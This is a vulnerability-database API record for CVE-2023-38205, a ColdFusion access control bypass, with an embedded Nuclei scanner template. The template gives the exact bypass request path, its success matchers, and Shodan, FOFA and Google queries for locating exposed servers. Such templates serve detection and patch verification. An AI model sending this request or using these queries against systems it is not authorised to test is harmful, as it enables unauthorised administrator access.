{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-38205/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-38205/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-38205/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-38205/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-38205/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-38205"},"sightings":{"href":"/api/v1/sightings/cve-2023-38205"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99742,"kev":true,"percentile":0.99954},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-38205.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-38205\n\ninfo:\n  name: Adobe ColdFusion - Access Control Bypass\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions.\n  remediation: |\n    Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability.\n  reference:\n    - https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/\n    - https://helpx.adobe.com/security/products/coldfusion/apsb23-47.html\n    - https://github.com/Ostorlab/KEV\n    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-38205\n    cwe-id: CWE-284,NVD-CWE-Other\n    epss-score: 0.99742\n    epss-percentile: 0.99954\n    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: adobe\n    product: coldfusion\n    shodan-query:\n      - http.component:\"Adobe ColdFusion\"\n      - http.component:\"adobe coldfusion\"\n      - http.title:\"coldfusion administrator login\"\n      - cpe:\"cpe:2.3:a:adobe:coldfusion\"\n    fofa-query:\n      - app=\"Adobe-ColdFusion\"\n      - app=\"adobe-coldfusion\"\n      - title=\"coldfusion administrator login\"\n    google-query: intitle:\"coldfusion administrator login\"\n  tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}\n\n      - type: dsl\n        dsl:\n          - contains(content_type, \"text/html\")\n          - status_code == 200\n          - len(trim_space(body)) == 106\n        condition: and\n# digest: 490a0046304402204939b3583c804952fa83ec2f8522b7785e7ac6cdeca70ab361c8dfea5191261502201424f34c75083781aaac8129b87bebf684668ceecff694aaeeb741df960b93cd:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-38205"}